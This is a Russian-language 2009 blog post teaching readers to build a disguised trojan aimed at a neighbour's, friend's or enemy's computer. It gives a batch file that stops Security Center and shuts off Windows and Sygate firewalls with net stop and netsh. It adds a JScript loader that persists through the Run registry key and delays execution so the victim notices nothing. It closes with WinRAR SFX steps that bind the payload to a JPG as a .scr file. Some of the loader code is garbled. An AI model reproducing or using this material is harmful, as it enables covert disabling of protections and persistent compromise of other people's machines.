Поиск по этому блогу

14 янв. 2009 г.

Убиваем файeрволы с помощью *.bat файла

Не так давно я прочитал статью в которой описывалось создание ботнета используя bat файлы.
Статью кстати советую почитать : http://www.hackzone.ru/articles/sozdanie_botnet.html
И мне пришла в голову идея намного попроще чем описывается в этой статье.


Наша цель : убить файерволы на машине соседа,друга или недруга.
Как ? : посылаем файл,в нашем случае это картинка с прикрепленным bat файлом и его loader'ом,который перепишет все 3 файла в папку %systemroot% и загрузит bat файл только через 5 минут после просмотра картинки с помощью лоадера.

Приступим к делу!Что нам понадобиться :
*Бесплатный архиватор WinRar и Notepad.

1) Пишем bat файл
Открываем Notepad в него копируем следующие строки :

net stop "Security Center" <- это останавливает встроенную систему безопасности винды,что бы не орала что файервол капут :) netsh firewall set opmode disable <- это убивает Microsoft Windows Firewall в XP net stop "Sygate Personal Firewall" <- это убивает Sygate Personal Firewall вместо него или в добавок к нему можно добавить и другие файерволы,антивирусы или сервисы(просто изменяем имя сервиса на нужный). А еще можно добавить команду которая запустит Telnet и сразу добавить своего юзера.Возможностей куча импровизируйте! Сохраняем как *.bat файл. 2) Пишем сам лоадер Опять таки открываем Notepad и вписываем следующие : //-------------------------------------------------------------------------------------------------------------------------------- var Jwsh = WScript.CreateObject("WScript.Shell"); var JobjArgs = WScript.Arguments; var string = ""; if (JobjArgs.length > 0)
{

for (var i=1; i300000); <- время задержки между картинкой и самим bat файлом milliseconds Jwsh.Run("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v имя лоадэра /t REG_SZ /d \"" + WScript.ScriptFullName + "\" /f", 0, true);
Jwsh.Run("имя файла.bat",0);
}

if (JobjArgs(0) == "-runshow") try{Jwsh.Run(string, 5);}
catch(e){}
if (JobjArgs(0) == "-runhide") try{Jwsh.Run(string, 0);}
catch(e){}

}


else
{
WScript.Sleep(10000);
Jwsh.Run("\"" + Jwsh.ExpandEnvironmentStrings("%systemroot%\\имя файла.bat"+ "\"",0);
}


//---------------------------------------------------------------------------------------------------------

Сохраняем с расширением *.js

3) Склеиваем картинку с *.bat и *.js файлом спомощью WinRar :

Вставляем все три файла в архив,не забудьте поставить галочку на SFX,по желанию можно добавить icon jpg чтоб выглядело отпадно :) архивируем.
Теперь открываем в WinRar идем в комментарии и там добавляем :

Path=%systemroot%
SavePath
Setup="*.jpg" <- вместо * имя вашей картинки Setup="*.js" -autorun <- вместо * имя вашего loader'a Silent=1 Overwrite=1 Все сохраняем архив и меняем концовку вместо exe на scr! Все готово,можете проверить на себе....картинка откроется и вместе с ней тихо сработает bat файл но только через 5 минут чтобы жертва ничего не заподозрила! Отсюда делаем вывод что всегда перед запуском того или иного файла нужно проверять его расширение и не принимать файлы от незнакомцев.

***Для чайников : все что начинается на <- не стоит вписывать а то ничего не сработает!***


Отдельное спасибо Bre@k кстати эта статья базировалась на его так что респект~!
Все описанное выше только для ознакомительных целей,автор не имеет ни какой ответственности за нанесение какого либо ущерба чайникам.

Комментариев нет:

Sociable